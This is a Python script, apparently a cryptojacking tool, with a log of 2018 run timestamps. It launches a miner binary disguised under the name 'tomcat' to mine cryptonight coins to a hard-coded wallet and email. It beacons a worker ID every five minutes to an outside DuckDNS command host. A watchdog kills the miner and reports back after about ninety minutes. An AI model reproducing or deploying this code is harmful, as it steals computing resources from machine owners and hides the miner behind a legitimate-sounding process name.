import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:06.844463
#2018-02-17 17:10:04.367067
#2018-02-17 18:58:05.163991
#2018-02-17 20:47:04.160243
#2018-02-17 22:33:07.106755
#2018-02-18 00:17:04.151567
#2018-02-18 02:08:04.491908
#2018-02-18 03:55:06.292953
#2018-02-18 05:42:06.270766
#2018-02-18 07:34:06.808816
#2018-02-18 09:22:04.757091
#2018-02-18 11:07:06.953985
#2018-02-18 12:54:04.915378
#2018-02-18 14:40:03.688976
#2018-02-18 16:29:07.045233
#2018-02-18 18:18:07.854521
#2018-02-18 20:04:04.160691
#2018-02-18 21:50:05.151519
#2018-02-18 23:39:06.753824
#2018-02-19 01:25:04.912019
#2018-02-19 03:13:05.544661
#2018-02-19 04:58:04.397673
#2018-02-19 06:44:04.148458
#2018-02-19 08:33:05.826649
#2018-02-19 10:22:06.486696
#2018-02-19 12:10:01.858291
#2018-02-19 13:57:01.657098
#2018-02-19 15:46:06.254108
#2018-02-19 17:33:06.943280
#2018-02-19 19:19:10.167912
#2018-02-19 21:07:05.443706
#2018-02-19 22:54:05.458503
#2018-02-20 00:39:04.713763
#2018-02-20 02:28:04.365430
#2018-02-20 04:17:06.906813
#2018-02-20 06:01:01.471894
#2018-02-20 07:46:06.049805
#2018-02-20 09:31:04.498884
#2018-02-20 11:14:09.058093
#2018-02-20 13:02:09.220438
#2018-02-20 14:47:08.920169
#2018-02-20 16:34:09.624826
#2018-02-20 18:20:11.934716
#2018-02-20 20:11:04.238021
#2018-02-20 21:56:07.635871
#2018-02-20 23:37:01.243771
#2018-02-21 01:21:01.583233
#2018-02-21 03:08:06.638856
#2018-02-21 04:57:05.284227
#2018-02-21 06:43:07.901955
#2018-02-21 08:29:07.027857
#2018-02-21 10:14:02.128651
#2018-02-21 12:02:05.639571
#2018-02-21 13:50:11.850720
#2018-02-21 15:32:08.935278
#2018-02-21 17:21:10.529357
#2018-02-21 19:10:06.923160
#2018-02-21 20:58:08.524325
#2018-02-21 22:44:06.991450
#2018-02-22 00:35:08.963915
#2018-02-22 02:22:04.065819
#2018-02-22 04:10:09.011424
#2018-02-22 05:55:01.472490
#2018-02-22 07:41:07.026645
#2018-02-22 09:29:02.193423
#2018-02-22 11:15:08.315985
#2018-02-22 13:02:06.632081
#2018-02-22 14:49:07.961020
#2018-02-22 16:36:07.597341
#2018-02-22 18:21:04.100562
#2018-02-22 20:12:07.830320
#2018-02-22 22:01:06.035665
#2018-02-22 23:49:09.044232
#2018-02-23 01:39:05.564546
#2018-02-23 03:25:05.591859
#2018-02-23 05:11:01.271732
#2018-02-23 07:10:01.529276
#2018-02-23 09:14:01.304890
#2018-02-23 11:19:09.301516
#2018-02-23 13:11:03.712764
#2018-02-23 14:56:04.336534
#2018-02-23 16:45:04.161227
#2018-02-23 18:32:05.073262
#2018-02-23 20:21:05.701857
#2018-02-23 22:08:08.636082
#2018-02-23 23:57:07.017796
#2018-02-24 01:48:01.733078
#2018-02-24 03:38:01.470348
#2018-02-24 05:22:01.997444
#2018-02-24 07:09:07.493696
#2018-02-24 08:58:07.254477
#2018-02-24 10:38:01.503437
#2018-02-24 12:24:04.494656
#2018-02-24 14:16:05.586399
#2018-02-24 16:02:07.560936
#2018-02-24 17:54:01.886703
#2018-02-24 19:41:06.599103
#2018-02-24 21:28:05.307926
#2018-02-25 00:11:06.946489
#2018-02-25 03:21:04.619230
#2018-02-25 07:03:01.596544